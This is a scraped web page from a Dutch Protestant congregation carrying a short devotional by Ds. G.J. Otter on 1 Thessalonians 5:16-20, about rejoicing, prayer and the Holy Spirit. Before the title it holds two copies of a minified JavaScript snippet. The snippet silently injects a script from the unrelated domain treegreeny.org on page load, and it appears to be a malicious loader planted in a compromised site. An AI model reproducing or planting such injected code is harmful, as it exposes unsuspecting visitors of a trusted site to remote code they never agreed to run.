;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Verblijd u altijd. Bid zonder ophouden. (1 Tessalonicenzen 5 vers 16 - 20) - PKN Damwâld

Verblijd u altijd. Bid zonder ophouden. (1 Tessalonicenzen 5 vers 16 – 20)

Gepubliceerd op: vrijdag 27 augustus 2021

Dank God in alles. Want dit is de wil van God in Christus Jezus voor u. Blus de Geest niet uit. Veracht de profetieën niet. Beproef alle dingen, behoud het goede. Onthoud u van elke vorm van kwaad. Met een paar krachtige opmerkingen besluit Paulus zijn brief. Verblijd u altijd, lukt dat? Paulus heeft dat zelf waarschijnlijk niet altijd kunnen doen. Hij verbindt het wel met bidden en God te danken temidden van iedere situatie. Wanneer we het gebed loslaten en het contact met de Here niet meer zoeken, lopen we gevaar de Heilige Geest uit te blussen. Hoe kan dan de blijdschap blijven leven? Liefde, blijdschap en vrede zijn vruchten van de Geest . Laten we Hem niet uitblussen, maar uitnodigen: Kom Heilige Geest met Uw kracht.  Ds. G.J. Otter